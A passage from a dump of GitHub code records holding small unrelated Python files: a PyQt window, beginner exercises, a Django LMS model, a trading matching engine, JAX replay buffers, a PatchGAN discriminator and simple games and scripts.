now!\")\r\n","repo_name":"adityaks-lts/my_python_scripts","sub_path":"chance_game/games.py","file_name":"games.py","file_ext":"py","file_size_in_byte":1601,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"}
+{"seq_id":"39590450201","text":"# -*- coding: utf-8 -*-\nimport sys\n\n# import the PyQt5 QtWidgets module\nfrom PyQt5 import QtWidgets\nfrom main_window import Ui_Form # import our generated UI file\n\n\nclass MyWindow(QtWidgets.QMainWindow):\n    def __init__(self):\n        super(MyWindow, self).__init__()\n        self.ui = Ui_Form()\n        self.ui.setupUi(self)\n\n\napp = QtWidgets.QApplication([])\napplication = MyWindow()\napplication.show()\n\nsys.exit(app.exec())\n","repo_name":"AstralMortem/get_random_photo_prnt.sc","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
+{"seq_id":"8022369369","text":"list_name = ['a', 'b', 'c']\n\nprint(list_name)\n\nnum = 5\nif num < 10:\n    print(\"Your number is small!\")\ntrolls = [\"Michael\", 'trolls', 'Matt']\n\nfor troll in trolls:\n    print(troll)\n\nif num < 10:\n    print('small num')\nelif num == 100:\n    print('100')\n\nnums = [1, 2, 3, 4, 5]\ndouble_nums = []\nfor num in nums:\n    double_nums.append(2 * num)\n\nprint(\"DONE\", double_nums)\n\n# list comprehension examples\n# can be used to replace map, filter, reduce\nnames = ['Steve', 'Matt', 'Kristen', 'Zack', 'Jason', 'Mary']\nshouts = [name.upper() for name in names]\n\nprint('upper', shouts)\n\ns = \"here is a string take a look at this!\"\nfreq_count = {char: s.count(char) for char in s}\n\nnums = [1, 2, 3, 4, 12, 18, 100, 5]\nsmall_nums = [10 + num for num in nums if num < 10]\ndouble_nums = [2 * num for num in nums]\nprint(double_nums, small_nums)\n\n# writing functions\n\n\ndef add(x, y):\n    return x + y\n\n\nprint(add(1, 2))\n","repo_name":"stevehcao/Rithm_Practice","sub_path":"python-is-great/example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":903,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
+{"seq_id":"70315682726","text":"from typing import List\n\n\n# Definition for a binary tree node.\nclass TreeNode:\n    def __init__(self, val=0, left=None, right=None):\n        self.val = val\n        self.left = left\n        self.right = right\n\n\nclass Solution:\n    def rightSideView(self, root: TreeNode) -> List[int]:\n        res = []\n        if root:\n            from collections import deque\n            que = deque([root])\n            while que:\n                node = que[-1] # the last node in the queue is the rightmost one on this level\n                res.append(node.val)\n\n                # collect all nodes of the next level\n                for i in range(len(que)):\n                    node = que.popleft()\n                    if node.left:\n                        que.append(node.left)\n                    if node.right:\n                        que.append(node.right)\n        return res","repo_name":"cxiaolong/Algorithm-Practice","sub_path":"PythonEdition/二叉树/二叉树遍历/层序遍历/199_rightSideView.py","file_name":"199_rightSideView.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
+{"seq_id":"14402804664","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models\nfrom django.db.models.signals import post_save\nfrom django.dispatch import receiver\nfrom django.contrib.auth.models import AbstractUser\n\nclass User(AbstractUser):\n    is_student = models.BooleanField(default=True)\n    is_teacher = models.BooleanField(default=False)\n\nclass Students(models.Model):\n    user = models.OneToOneField(User, on_delete=models.CASCADE, primary_key=True)\n    student_id = models.IntegerField(null=True)\n    gpa = models.DecimalField(decimal_places=2, max_digits=3, null=True)\n\n    class Meta:\n        verbose_name_plural = \"Students\"\n\nclass Faculty(models.Model):\n    faculty_id = models.IntegerField(primary_key = True)\n    firstName = models.CharField(max_length=40)\n    lastName = models.CharField(max_length=40)\n    email = models.EmailField()\n    password = models.CharField(max_length=64)\n    jobTitle = 
models.CharField(max_length=40)\n\n class Meta:\n verbose_name_plural = \"Faculty\"\n\n def __str__(self):\n return \"%s %s\" % (self.firstName,self.lastName)\n\nclass Courses(models.Model):\n course_id = models.IntegerField(primary_key = True)\n courseName = models.CharField(max_length=40)\n faculty = models.ForeignKey(Faculty, on_delete=models.CASCADE,)\n\n class Meta:\n verbose_name_plural = \"Courses\"\n\n def __str__(self):\n return self.courseName\n\nclass Grades(models.Model):\n grade_id = models.IntegerField(primary_key = True)\n student = models.ForeignKey(Students,on_delete=models.CASCADE)\n course = models.ForeignKey(Courses,on_delete=models.CASCADE)\n courseGrade = models.IntegerField()\n\n class Meta:\n verbose_name_plural = \"Grades\"\n","repo_name":"Rockcoldice/CS3321_LMS_Project","sub_path":"myLMS_website/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"9592487578","text":"from Event.trade_event import TradeEvent\n\nfrom Exchange.exchange_db_query import ExchangeDbQuery\n\nclass MatchingEngine:\n\tdef __init__(self, conn):\n\t\tself._conn = conn\n\t\tself._engine_id = 3000\n\n\tdef check_order_book(self, symbol, book_ext):\n\t\tbook_name = '_'.join((book_ext, str(symbol)))\n\t\tquery = ExchangeDbQuery.get_top_level_order_book_data_query().format(book_name)\n\t\trows, cols = self._conn.select(query)\n\t\tprint(query)\n\t\tif not cols:\n\t\t\traise Exception(\"DbError\")\n\t\tif not rows: \n\t\t\treturn None\n\n\t\tprice = rows[0][cols.index('price')]\n\n\t\tquery = ExchangeDbQuery.get_earliest_buy_order_at_price_query().format(price, symbol)\n\t\trows, cols = self._conn.select(query)\n \n\t\tbuy_order_id = rows[0][cols.index('order_id')]\n\t\tbuy_player_id = rows[0][cols.index('player_id')]\n\t\tbuy_quantity = rows[0][cols.index('quantity')]\n\t\tbuy_lut = rows[0][cols.index('last_updated_time')]\n\n\t\tquery = ExchangeDbQuery.get_earliest_sell_order_at_price_query().format(price, symbol)\n\t\trows, cols = self._conn.select(query)\n\n\t\tsell_order_id = rows[0][cols.index('order_id')]\n\t\tsell_player_id = rows[0][cols.index('player_id')]\n\t\tsell_quantity = rows[0][cols.index('quantity')]\n\t\tsell_lut = rows[0][cols.index('last_updated_time')]\n\t\t\n\t\tte = TradeEvent(symbol, self._engine_id, buy_order_id, sell_player_id, buy_quantity, sell_quantity, buy_player_id, sell_player_id, buy_lut, sell_lut, price)\n\t\treturn te","repo_name":"imnotaqtpie/National-Simulated-Exchange","sub_path":"Exchange/matching_engine.py","file_name":"matching_engine.py","file_ext":"py","file_size_in_byte":1384,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"9612022269","text":"#!/usr/bin/env python3\n# -*- coding: UTF-8 -*-\n\n\nans=chk=0\nd=[]\nfor i in range(5):\n x=int(input())\n if x%10:\n d.append((x%10,x))\n else:\n ans+=x\nd.sort(reverse=True)\nfor i in d:\n ans+=((i[1]+10)//10)*10\nif len(d): ans-=10-d[-1][1]%10\n\nprint(ans)\n","repo_name":"clarinet758/atcoder","sub_path":"abc/b101_125/b123/b1.py","file_name":"b1.py","file_ext":"py","file_size_in_byte":271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"75326360164","text":"from typing import Dict, Iterable, Optional, Tuple, Union\nimport collections\nimport jax\nimport numpy as np\nfrom gym.utils import seeding\n\nfrom jaxrl2.types import DataType\n\nDatasetDict = Dict[str, 
DataType]\nfrom flax.core import frozen_dict\n\ndef concat_recursive(batches):\n new_batch = {}\n for k, v in batches[0].items():\n if isinstance(v, frozen_dict.FrozenDict):\n new_batch[k] = concat_recursive([batches[0][k], batches[1][k]])\n else:\n new_batch[k] = np.concatenate([b[k] for b in batches], 0)\n return new_batch\n\ndef _check_lengths(dataset_dict: DatasetDict,\n dataset_len: Optional[int] = None) -> int:\n for v in dataset_dict.values():\n if isinstance(v, dict):\n dataset_len = dataset_len or _check_lengths(v, dataset_len)\n elif isinstance(v, np.ndarray):\n item_len = len(v)\n dataset_len = dataset_len or item_len\n assert dataset_len == item_len, 'Inconsistent item lengths in the dataset.'\n else:\n raise TypeError('Unsupported type.')\n return dataset_len\n\n\ndef _split(dataset_dict: DatasetDict,\n index: int) -> Tuple[DatasetDict, DatasetDict]:\n train_dataset_dict, test_dataset_dict = {}, {}\n for k, v in dataset_dict.items():\n if isinstance(v, dict):\n train_v, test_v = _split(v, index)\n elif isinstance(v, np.ndarray):\n train_v, test_v = v[:index], v[index:]\n else:\n raise TypeError('Unsupported type.')\n train_dataset_dict[k] = train_v\n test_dataset_dict[k] = test_v\n return train_dataset_dict, test_dataset_dict\n\n\ndef _sample(dataset_dict: Union[np.ndarray, DatasetDict],\n indx: np.ndarray) -> DatasetDict:\n if isinstance(dataset_dict, np.ndarray):\n return dataset_dict[indx]\n elif isinstance(dataset_dict, dict):\n batch = {}\n for k, v in dataset_dict.items():\n batch[k] = _sample(v, indx)\n else:\n raise TypeError(\"Unsupported type.\")\n return batch\n\n\nclass Dataset(object):\n\n def __init__(self, dataset_dict: DatasetDict, seed: Optional[int] = None):\n self.dataset_dict = dataset_dict\n self.dataset_len = _check_lengths(dataset_dict)\n\n # Seeding similar to OpenAI Gym:\n # https://github.com/openai/gym/blob/master/gym/spaces/space.py#L46\n self._np_random = None\n if seed is not None:\n self.seed(seed)\n\n @property\n def np_random(self) -> np.random.RandomState:\n if self._np_random is None:\n self.seed()\n return self._np_random\n\n def seed(self, seed: Optional[int] = None) -> list:\n self._np_random, seed = seeding.np_random(seed)\n return [seed]\n\n def __len__(self) -> int:\n return self.dataset_len\n\n def sample(self,\n batch_size: int,\n keys: Optional[Iterable[str]] = None,\n indx: Optional[np.ndarray] = None) -> frozen_dict.FrozenDict:\n if indx is None:\n if hasattr(self.np_random, 'integers'):\n indx = self.np_random.integers(len(self), size=batch_size)\n else:\n indx = self.np_random.randint(len(self), size=batch_size)\n\n batch = dict()\n\n if keys is None:\n keys = self.dataset_dict.keys()\n\n for k in keys:\n if isinstance(self.dataset_dict[k], dict):\n batch[k] = _sample(self.dataset_dict[k], indx)\n else:\n batch[k] = self.dataset_dict[k][indx]\n\n return frozen_dict.freeze(batch)\n\n def split(self, ratio: float) -> Tuple['Dataset', 'Dataset']:\n assert 0 < ratio and ratio < 1\n index = int(self.dataset_len * ratio)\n train_dataset_dict, test_dataset_dict = _split(self.dataset_dict,\n index)\n return Dataset(train_dataset_dict), Dataset(test_dataset_dict)\n\n\nclass MixingReplayBuffer():\n\n def __init__(\n self,\n replay_buffers,\n mixing_ratio\n ):\n\n \"\"\"\n :param replay_buffers: sample from given replay buffer with specified probability\n \"\"\"\n\n self.replay_buffers = replay_buffers\n self.mixing_ratio = mixing_ratio\n assert len(replay_buffers) == 2\n\n def sample(self,\n batch_size: int,\n keys: Optional[Iterable[str]] 
= None,\n indx: Optional[np.ndarray] = None) -> frozen_dict.FrozenDict:\n\n batches = []\n size_first = int(np.floor(batch_size*self.mixing_ratio))\n sub_batch_sizes = [size_first, batch_size - size_first]\n for buf, sb in zip(self.replay_buffers, sub_batch_sizes):\n batches.append(buf.sample(sb))\n\n\n return frozen_dict.freeze(concat_recursive(batches))\n\n def set_mixing_ratio(self, mixing_ratio):\n self.mixing_ratio = mixing_ratio\n\n def seed(self, seed):\n [b.seed(seed) for b in self.replay_buffers]\n\n def length(self):\n return [b.length() for b in self.replay_buffers]\n\n def get_random_trajs(self, batch_size):\n return [b.get_random_trajs(batch_size) for b in self.replay_buffers]\n\n\n def get_iterator(self,\n batch_size: int,\n keys: Optional[Iterable[str]] = None,\n indx: Optional[np.ndarray] = None,\n queue_size: int = 2):\n # See https://flax.readthedocs.io/en/latest/_modules/flax/jax_utils.html#prefetch_to_device\n # queue_size = 2 should be ok for one GPU.\n\n queue = collections.deque()\n\n def enqueue(n):\n for _ in range(n):\n data = self.sample(batch_size, keys, indx)\n queue.append(jax.device_put(data))\n\n enqueue(queue_size)\n while queue:\n yield queue.popleft()\n enqueue(1)\n \n def increment_traj_counter(self):\n [b.increment_traj_counter() for b in self.replay_buffers]\n\n def compute_action_stats(self):\n\n action_stats_0 = self.replay_buffers[0].compute_action_stats()\n action_stats_1 = self.replay_buffers[1].compute_action_stats()\n\n ratio = self.mixing_ratio\n actions_mean = ratio * action_stats_0['mean'] + (1 - ratio) * action_stats_1['mean']\n actions_std = np.sqrt(ratio * action_stats_0['std'] ** 2 + (1 - ratio) * action_stats_1['std']** 2 + ratio * (1 - ratio) * (action_stats_0['mean'] - action_stats_1['mean']) ** 2)\n\n return {'mean': actions_mean, 'std': actions_std}\n\n def normalize_actions(self, action_stats):\n # do not normalize gripper dimension (last dimension)\n [b.normalize_actions(action_stats) for b in self.replay_buffers]\n \nclass MixingReplayBufferParallel():\n \n def __init__(\n self,\n replay_buffers,\n mixing_ratio,\n num_devices=len(jax.devices())\n ):\n\n \"\"\"\n :param replay_buffers: sample from given replay buffer with specified probability\n \"\"\"\n\n self.replay_buffers = replay_buffers\n self.mixing_ratio = mixing_ratio\n assert len(replay_buffers) == 2\n self.num_devices=num_devices\n\n def sample(self,\n batch_size: int,\n keys: Optional[Iterable[str]] = None,\n indx: Optional[np.ndarray] = None) -> frozen_dict.FrozenDict:\n\n batches = []\n size_first = int(np.floor(batch_size*self.mixing_ratio))\n sub_batch_sizes = [size_first, batch_size - size_first]\n for buf, sb in zip(self.replay_buffers, sub_batch_sizes):\n batches.append(buf.sample(sb))\n\n\n return frozen_dict.freeze(concat_recursive(batches))\n\n def set_mixing_ratio(self, mixing_ratio):\n self.mixing_ratio = mixing_ratio\n\n def seed(self, seed):\n [b.seed(seed) for b in self.replay_buffers]\n\n def length(self):\n return [b.length() for b in self.replay_buffers]\n\n def get_random_trajs(self, batch_size):\n return [b.get_random_trajs(batch_size) for b in self.replay_buffers]\n\n\n def get_iterator(self,\n batch_size: int,\n keys: Optional[Iterable[str]] = None,\n indx: Optional[np.ndarray] = None,\n queue_size: int = 2):\n # See https://flax.readthedocs.io/en/latest/_modules/flax/jax_utils.html#prefetch_to_device\n # queue_size = 2 should be ok for one GPU.\n\n queue = collections.deque()\n\n def enqueue(n):\n assert batch_size % self.num_devices == 0\n 
effective_batch_size = batch_size // self.num_devices\n            for _ in range(n):\n                data = [self.sample(effective_batch_size, keys, indx) for _ in range(self.num_devices)] \n                queue.append(jax.device_put_sharded(data, jax.devices()))\n\n        enqueue(queue_size)\n        while queue:\n            yield queue.popleft()\n            enqueue(1)\n    \n    def increment_traj_counter(self):\n        [b.increment_traj_counter() for b in self.replay_buffers]\n\n    def compute_action_stats(self):\n\n        action_stats_0 = self.replay_buffers[0].compute_action_stats()\n        action_stats_1 = self.replay_buffers[1].compute_action_stats()\n\n        ratio = self.mixing_ratio\n        actions_mean = ratio * action_stats_0['mean'] + (1 - ratio) * action_stats_1['mean']\n        actions_std = np.sqrt(ratio * action_stats_0['std'] ** 2 + (1 - ratio) * action_stats_1['std']** 2 + ratio * (1 - ratio) * (action_stats_0['mean'] - action_stats_1['mean']) ** 2)\n\n        return {'mean': actions_mean, 'std': actions_std}\n\n    def normalize_actions(self, action_stats):\n        # do not normalize gripper dimension (last dimension)\n        [b.normalize_actions(action_stats) for b in self.replay_buffers]\n","repo_name":"Asap7772/PTR","sub_path":"jaxrl2/data/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":9793,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"52"}
+{"seq_id":"20021988799","text":"import random\r\n\r\n\r\nwith open('data//buy_data.txt', 'w') as f: #generate purchase data\r\n    for i in range(1000): #assume there are 1000 people\r\n        for x in range(random.randint(0,30)): #assume each person buys 0~30 items\r\n            f.write(str(i) + '\t' +'item'+str(random.randint(0,99)) + '\t' + 'buy' + '\n') #write one purchase record (assume there are 100 items)\r\n\r\n\r\nwith open('data//entities.txt', 'w') as f: #generate the entity index\r\n    for i in range(1000): #1000 people and 100 items\r\n        f.write(str(i) + '\t' +str(i) +'\n') #index for the people\r\n    for i in range(100):\r\n        f.write('item'+str(i)+'\t'+str(1000+i)+'\n') #index for the items\r\n\r\nwith open('data//relations.txt', 'w') as f: #generate the relation index\r\n    f.write('buy' + '\t' +str(0) +'\n') #could also be extended with relations such as add-to-cart, purchase and favourite\r\n","repo_name":"Zhankun-Xiong/Recommendation-system-based-on-knowledge-graph-embedding","sub_path":"knowledge graph embedding的商品推荐系统/generate_data.py","file_name":"generate_data.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"zh","doc_type":"code","stars":141,"dataset":"github-code","pt":"52"}
+{"seq_id":"33455550028","text":"class Solution:\r\n    def twoSum(self, nums: List[int], target: int) -> List[int]:\r\n        #List is not defined as the test cases are provided by LeetCode\r\n        #1 loop through the list\r\n        \r\n        for i in range(len(nums)):\r\n            \r\n            #2 add the second int to the first\r\n            for j in range(i+1, len(nums)):\r\n                total = nums[i] + nums[j]\r\n                #3 check the sum against the target \r\n                #3.1 if yes then return as output\r\n                if total == target:\r\n                    return (i, j)\r\n        #3.2 if no pair matched by the end of the list, report it once\r\n        #(the old else printed \"No Sum Found\" for every non-matching pair)\r\n        print(\"No Sum Found\")\r\n\r\n","repo_name":"JosephBanks1/leetcode-practice","sub_path":"Two Sum.py","file_name":"Two Sum.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
+{"seq_id":"72775130724","text":"from yuuhpizzakebab import app, admin_required, login_required\nfrom .models import Drink\nfrom flask import render_template, session, redirect, url_for, request, flash\n\n\n@app.route('/drinks', methods=['GET'])\ndef list_drinks():\n    \"\"\"Shows a list of drinks.\"\"\"\n    return render_template('drink/drinks.html',\n                            
drinks=Drink.get_all(),\n                           selecting=request.args.get('selecting'))\n\n\n@app.route('/drink/create', methods=['GET', 'POST'])\n@admin_required\ndef create_drink():\n    \"\"\"Creates a new drink.\n\n    Creates a new drink with POST.\n    Shows a form to fill with GET.\n    \"\"\"\n    if request.method == 'POST':\n        name = request.form['drink_name']\n        price = request.form['drink_price']\n        image_url = request.form['drink_image_url']\n\n        d = Drink(None, name, price, image_url)\n        success = d.save()\n\n        if not success:\n            flash('Some fields need to be filled', 'alert-danger')\n            return render_template('drink/edit_drink.html', drink=d)\n\n        flash('Created drink', 'alert-success')\n        return redirect(url_for('list_drinks'))\n\n    return render_template('drink/edit_drink.html')\n\n\n@app.route('/drink/edit/<int:drink_id>', methods=['GET', 'POST'])\n@admin_required\ndef edit_drink(drink_id):\n    \"\"\"Edits a drink.\n\n    arguments:\n    drink_id -- id of the drink\n\n    Saves the information with POST.\n    Shows a form to edit the contents with GET.\n    \"\"\"\n    if request.method == 'POST':\n        name = request.form['drink_name']\n        price = request.form['drink_price']\n        image_url = request.form['drink_image_url']\n\n        k = Drink(drink_id, name, price, image_url)\n        k.save()\n\n        return redirect(url_for('list_drinks'))\n\n    drink = Drink.get_by_id(drink_id)\n\n    if not drink:\n        return redirect(url_for('list_drinks'))\n\n    return render_template('drink/edit_drink.html', drink=drink)\n\n\n@app.route('/drink/delete/<int:drink_id>', methods=['GET'])\n@admin_required\ndef delete_drink(drink_id):\n    \"\"\"Deletes a drink.\n\n    arguments:\n    drink_id -- id of the drink\n    \"\"\"\n    Drink.delete_by_id(drink_id)\n    flash('Removed drink', 'alert-success')\n\n    return redirect(url_for('list_drinks'))\n","repo_name":"lex/yuuh-pizza-kebab","sub_path":"yuuhpizzakebab/drink/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
+{"seq_id":"2398219770","text":"\"\"\"\nPatchGAN Discriminator (https://github.com/junyanz/pytorch-CycleGAN-and-pix2pix/blob/master/models/networks.py#L538)\n\"\"\"\nimport argparse\nimport torch\nimport torch.nn as nn\n\nclass Discriminator(nn.Module):\n    def __init__(self, args, num_filters_last=64, n_layers=3) -> None:\n        super().__init__()\n        \n        layers = [nn.Conv2d(args.image_channels, num_filters_last, 4, 2, 1), nn.LeakyReLU(0.2)]\n        num_filters_mult = 1\n\n        for i in range(1, n_layers + 1):\n            num_filters_mult_last = num_filters_mult\n            num_filters_mult = min(2 ** i, 8)\n            layers += [\n                nn.Conv2d(num_filters_last * num_filters_mult_last, num_filters_last * num_filters_mult, 4,\n                          2 if i < n_layers else 1, 1, bias=False),\n                nn.BatchNorm2d(num_filters_last * num_filters_mult),\n                nn.LeakyReLU(0.2, True)\n            ]\n\n        layers.append(nn.Conv2d(num_filters_last * num_filters_mult, 1, 4, 1, 1))\n        self.model = nn.Sequential(*layers)\n    \n\n    def forward(self, x):\n        return self.model(x)\n    \nif __name__ == '__main__':\n    parser = argparse.ArgumentParser(description=\"discriminator\")\n    parser.add_argument('--image_channels', type=int, default=3, help='')\n\n    args = parser.parse_args()\n    \n    d = Discriminator(args)\n    \n    x = torch.randn(1, 3, 256, 256)\n    print(d(x).shape)","repo_name":"Lionelding/VQGAN_Pytorch_Practise","sub_path":"discriminator.py","file_name":"discriminator.py","file_ext":"py","file_size_in_byte":1437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
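A quick editorial aside on the PatchGAN record above: with the default n_layers=3 the stack is three stride-2 convolutions followed by two stride-1 convolutions, all with 4x4 kernels, which yields the well-known 70x70 receptive field. The sketch below (plain Python; the helper name receptive_field is ours, not the repo's) shows the standard backward recurrence used to verify that number.

def receptive_field(layers):
    # walk from the output back to the input: rf = (rf - 1) * stride + kernel
    rf = 1
    for kernel, stride in reversed(layers):
        rf = (rf - 1) * stride + kernel
    return rf

# kernel/stride pairs mirroring the record's n_layers=3 discriminator
print(receptive_field([(4, 2), (4, 2), (4, 2), (4, 1), (4, 1)]))  # -> 70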
+{"seq_id":"37807722552","text":"'''\nGISSATALET.PY: A number guessing game\n\n__author__ = \"Johan Wrangö\"\n__credits__ = [\"Anne Onym\", \"Pseudo Nyman\", \"John Noname\"]\n__version__ = \"1.0.5\"\n__email__ = \"johan.wrango@ga.ntig.se\"\n'''\n\nimport random \nimport os #för os.system() så jag kan sudda skärmen\nfrom colors import bcolors #hämta färgkoder från modul \"colors\"\n\n\nwhile True: #Huvudloop så man kan köra flera spelomgångar. Om denna slutas avslutas spelet.\n os.system('cls') \n\n print(bcolors.YELLOW + \"\"\"\n ==============================\n G I S S A T A L E T 1 - 100 \n ====== Du har 7 försök! ======\\n\\n\"\"\")\n\n secret_number = random.randint(1, 100) \n total_guesses = 0\n\n while total_guesses <= 7: #Spelloop: Aktuellt spel\n try:\n guess = int(input(bcolors.DEFAULT + \"Gissa mitt hemliga tal: \"))\n except ValueError:\n print(bcolors.RED + \"Du måste skriva ett heltal - pröva igen\\n\")\n continue\n \n total_guesses += 1\n \n if guess > secret_number:\n print(bcolors.RED + \"För HÖGT\")\n elif guess < secret_number:\n print(bcolors.PURPLE + \"För LÅGT\")\n elif guess == secret_number:\n print(bcolors.GREEN + f'\\nGrattis! Du hittade hemliga talet {secret_number} på ' +\n str(total_guesses)+' försök!\\n\\n')\n break\n \n if total_guesses == 7: \n print(bcolors.YELLOW + f'\\nTyvärr, du hittade inte mitt hemliga tal: {secret_number}.')\n break\n \n #Spelet frågar alltid om man vill spela igen efter man vunnit eller förlorat\n try_again = input(bcolors.DEFAULT + 'Spela igen? (Enter = Ja / N = Nej) ').upper()\n if try_again == 'N' or try_again == 'NEJ':\n print('Tack för du spelade - ses nästa gång!')\n exit() #Här kan man använda break istället - men gör såhär för att avsluta direkt\n","repo_name":"wrangman/GissaTalet","sub_path":"gissatalet.py","file_name":"gissatalet.py","file_ext":"py","file_size_in_byte":2121,"program_lang":"python","lang":"sv","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"11442545835","text":"#this program will read the steps.csv file, calculate the average number of steps in a given month, and output \n#the average steps per month and the month name in a new csv file. 
+{"seq_id":"11442545835","text":"#this program will read the steps.csv file, calculate the average number of steps in a given month, and output\n#the average steps per month and the month name in a new csv file.\n\n#import csv module\nimport csv\n\n#define main\ndef main():\n\n    #open files\n    infile = open('steps.csv', 'r')\n    outfile = open('avg._steps.csv', 'w')\n\n    #read contents into csv object\n    csvfile = csv.reader(infile, delimiter = ',')\n\n    #skip first row\n    next(csvfile)\n\n    months = [['1','January'], ['2', 'February'], ['3', 'March'], ['4', 'April'], ['5','May'],['6','June'],['7','July'],['8','August'],['9','September'],['10','October'],['11','November'],['12','December']]\n\n    monthly_counter = 0\n    monthly_bin = 0\n    daily_counter = 0\n    average = 0\n\n    for line in csvfile:\n        monthly_value = line[0]\n        daily_value = line[1]\n        if monthly_value == months[monthly_counter][0]:\n            monthly_bin = int(daily_value) + monthly_bin\n            daily_counter += 1\n        else:\n            average = monthly_bin // daily_counter\n            outfile.write(months[monthly_counter][1] + ':' + ' ' + str(average) + '\\n')\n            monthly_counter += 1\n            #the current row belongs to the new month, so start its totals with it\n            daily_counter = 1\n            monthly_bin = int(daily_value)\n\n    #the loop never flushes the final month, so write it here\n    if daily_counter > 0:\n        average = monthly_bin // daily_counter\n        outfile.write(months[monthly_counter][1] + ':' + ' ' + str(average) + '\\n')\n\n    #close the outfile\n    outfile.close()\n\n#call main\nmain()\n","repo_name":"kwilliams-98/ReadAndWriteFiles","sub_path":"avg_steps.py","file_name":"avg_steps.py","file_ext":"py","file_size_in_byte":1363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
+{"seq_id":"38349012513","text":"\"\"\"\nDescription:\n\nThe input is a string str of digits. Cut the string into chunks (a chunk here is\na substring of the initial string) of size sz (ignore the last chunk if its\nsize is less than sz).\n\nIf a chunk represents an integer such that the sum of the cubes of its digits is\ndivisible by 2, reverse that chunk; otherwise rotate it to the left by one\nposition. Put together these modified chunks and return the result as a string.\n\"\"\"\n\n\ndef check_number(str_num):\n    return not sum(map(int, list(str_num))) % 2\n\n\ndef str_reverse(string):\n    return \"\".join([symb for symb in string[::-1]])\n\n\ndef revrot(strng, sz):\n    res = \"\"\n    if sz <= 0 or not strng:\n        return res\n    for i in range(len(strng) // sz):\n        # print(strng[i * sz:(i + 1) * sz])\n        if len(strng[i * sz:]) < sz:\n            return res\n        if check_number(strng[i * sz:(i + 1) * sz]):\n            # print(str_reverse(strng[i * sz:(i + 1) * sz]))\n            res += str_reverse(strng[i * sz:(i + 1) * sz])\n        else:\n            res += strng[i * sz + 1:(i + 1) * sz] + strng[i * sz]\n    return res\n\n\nif __name__ == \"__main__\":\n    s = \"73304991087281576455176044327690580265896\"\n    ans = \"1994033775182780067155464327690480265895\"\n    print(revrot(s, 8), ans, sep=\"\\n\")\n    assert revrot(s, 8) == ans\n","repo_name":"MaximSinyaev/CodeWars","sub_path":"c6kyu/reverse_or_rotate.py","file_name":"reverse_or_rotate.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"}
+{"seq_id":"39372974428","text":"#Author Adolfo Lara June 25 2020\n\nimport random\n# Exercise: You are infected with bacteria characterized as: 13 blue, 6 red, and 1 white.\n#In this infection, white bacteria are the hardest to kill.\nbluebac=13\nredbac=6\nwhitebac=1\n\n#As part of the treatment, we will mimic medicine with dice. This list represents a dice roll 1-6.\n#1,3,5,6 - you took medicine: remove 3 bacteria (blue first).\n#2 or 4 - you forgot medicine: remove 0 bacteria, add 1 of each.\nt = [1, 2, 3, 4, 5, 6]\n\n#Antibiotics you take are for 10 days, thus variable \"i\" keeps track of them.\ni = 0\n\n#If you roll a \"1, 3, 5, 6\" this means you took your antibiotics.\n#If you took your antibiotics, 3 bacteria die and none reproduce.\n#The loop below takes away 3 bacteria at a time, starting with the blue, then red, and finally white bacteria.\n\n#If you roll a \"2, 4\" this means you did not take your antibiotics.\n#If you did not take your antibiotics, the bacteria will reproduce.\n#In that case the loop adds 1 to each of the blue, red, and white bacteria.\n\n#At the end of 10 tries (days), if you have 5 or more white bacteria, the bacteria win.\nwhile i < 10:\n\ts = random.choice(t)\n\tif s in (1, 3, 5, 6):\n\t\t#medicine taken: remove 3 bacteria, cascading blue -> red -> white\n\t\tif bluebac > 0:\n\t\t\tbluebac = bluebac - 3\n\t\tif bluebac <= 0 and redbac > 0:\n\t\t\tredbac = redbac - 3\n\t\tif bluebac <= 0 and redbac <= 0 and whitebac > 0:\n\t\t\twhitebac = whitebac - 3\n\telse:\n\t\t#medicine forgotten (2 or 4): each colour reproduces\n\t\tbluebac = bluebac + 1\n\t\tredbac = redbac + 1\n\t\twhitebac = whitebac + 1\n\tprint('Your dice-roll number',i+1,'is',s)\n\tprint(bluebac,redbac,whitebac)\n\ti = i + 1\n\nif whitebac >= 5:\n\tprint('Your distribution of bacteria after 10 days are:',bluebac,'blue',redbac,'red',whitebac, 'white,', 'this means bacteria won.')\nelse:\n\tprint('Your distribution of bacteria after 10 days are:',bluebac,'blue',redbac,'red',whitebac, 'white,', 'this means you are alive.')\n","repo_name":"alaragit/Teaching","sub_path":"UB2020-antibiotics_exercise/antibiotics_code.py","file_name":"antibiotics_code.py","file_ext":"py","file_size_in_byte":2506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"}
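One run of the simulation above is a single sample; repeating it estimates how often the treatment fails under the same rules. An editor's sketch (the cascade mirrors the loop above; the 10,000-trial count is arbitrary):

    import random

    def one_course(blue=13, red=6, white=1, days=10):
        for _ in range(days):
            s = random.randint(1, 6)
            if s in (1, 3, 5, 6):
                if blue > 0: blue -= 3
                if blue <= 0 and red > 0: red -= 3
                if blue <= 0 and red <= 0 and white > 0: white -= 3
            else:
                blue += 1; red += 1; white += 1
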